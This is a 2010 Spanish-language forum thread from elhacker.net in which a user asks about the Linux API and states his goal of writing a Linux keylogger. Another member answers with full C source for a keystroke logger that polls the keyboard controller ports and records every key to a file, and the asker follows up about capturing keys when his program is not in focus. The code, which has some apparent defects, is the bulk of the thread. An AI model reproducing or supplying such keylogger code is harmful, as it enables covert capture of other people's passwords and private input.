elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación C/C++ (Moderadores: Eternal Idol, Littlehorse, K-YreX)
| | |-+  Api de linux
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Api de linux  (Leído 6,313 veces)
Gallu

Desconectado Desconectado

Mensajes: 247



Ver Perfil
Api de linux
« en: 27 Agosto 2010, 11:50 am »

Hola ,  estoy buscando información sobre el api de linux , en principio me gustaría saber si es algo parecido al api de windows , alguien conoce algún enlace , libro ?


En línea

Nadie alcanza la meta con un solo intento, ni perfecciona la vida con una sola rectificación, ni alcanza altura con un solo vuelo.
Komodo


Desconectado Desconectado

Mensajes: 352



Ver Perfil
Re: Api de linux
« Respuesta #1 en: 27 Agosto 2010, 12:36 pm »

Supongo que te refieres al Kernel API Linux quien mejor que ellos mismos:

http://kernelbook.sourceforge.net/kernel-api.pdf


En línea


Gallu

Desconectado Desconectado

Mensajes: 247



Ver Perfil
Re: Api de linux
« Respuesta #2 en: 27 Agosto 2010, 12:53 pm »

Algo así , encontre algo muchisimo más completo , con mucha documentación y código fuente

http://lxr.linux.no/#linux+v2.6.35/

mi idea es crear un keylogger para linux , he intentado usar el lkl , pero la verdad no he podido , asi que pienso hacerlo desde 0.  Si alguien tiene idea de por donde debo empezar le agradeceria que me la comentara.

Muchas gracias
En línea

Nadie alcanza la meta con un solo intento, ni perfecciona la vida con una sola rectificación, ni alcanza altura con un solo vuelo.
Komodo


Desconectado Desconectado

Mensajes: 352



Ver Perfil
Re: Api de linux
« Respuesta #3 en: 27 Agosto 2010, 13:09 pm »

Código
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <unistd.h>
  4. #include <sys/io.h>
  5. #define KB_IO 0X60
  6. #define KB_ST 0x64
  7. #define SLEEP 50
  8. key(int code) {
  9. int i;
  10. int ascii_code[] = {
  11. 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30,
  12. 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50,
  13. 51, 52, 53, 57};
  14. int ascii_char[] = {
  15. '0', ''', 'ì', 'b', 't', 'q', 'w', 'e', 'r', 't', 'y', 'u', 'i', 'o', 'p', 'è',
  16. '+', 'n', 'a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l', 'ò', 'à', '<', 'ù', 'z',
  17. 'x', 'c', 'v', 'b', 'n', 'm', ',', '.', '-', ' '};
  18. for (i = 0; i < 42; i++) {
  19. if (code == ascii_code[i])
  20. return ascii_char[i];
  21. }
  22. }
  23. int main(int argc, char **argv) {
  24. int code = 0;
  25. int last = 0;
  26. FILE *file;
  27. if (!argv[1]) {
  28. fprintf(stderr, "%s <file>n", argv[0]);
  29. exit(1);
  30. }
  31. if (!(file = fopen(argv[1], "w"))) {
  32. fprintf(stderr, "imposible escribir %sn", argv[1]);
  33. exit(2);
  34. }
  35. if (ioperm(KB_IO, 1, 1) == -1 || ioperm(KB_ST, 1, 1) == -1) {
  36. fprintf(stderr, "fail");
  37. exit(3);
  38. }
  39. while (1) {
  40. code = 0;
  41. if (inb(KB_ST) == 20)
  42. code = inb(KB_IO);
  43. if (code) {
  44. if (code != last) {
  45. last = code;
  46. if (key(code)) {
  47. fprintf(file, "%c", key(code));
  48. fflush(file);
  49. }
  50. }
  51. }
  52. usleep(SLEEP);
  53. }
  54. return 0;
  55. }
  56.  
En línea


Gallu

Desconectado Desconectado

Mensajes: 247



Ver Perfil
Re: Api de linux
« Respuesta #4 en: 27 Agosto 2010, 13:25 pm »

¿Este código se ejecuta en segundo plano ? , me refiero a si registra las teclas aun cuando la aplicación no tenga el foco .
En línea

Nadie alcanza la meta con un solo intento, ni perfecciona la vida con una sola rectificación, ni alcanza altura con un solo vuelo.
Komodo


Desconectado Desconectado

Mensajes: 352



Ver Perfil
Re: Api de linux
« Respuesta #5 en: 27 Agosto 2010, 13:53 pm »

eso ya curratelo tu,no?
En línea


cbug

Desconectado Desconectado

Mensajes: 147



Ver Perfil
Re: Api de linux
« Respuesta #6 en: 29 Agosto 2010, 23:59 pm »

Un buen libro: Linux system programming. Ed: O'Reilly
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines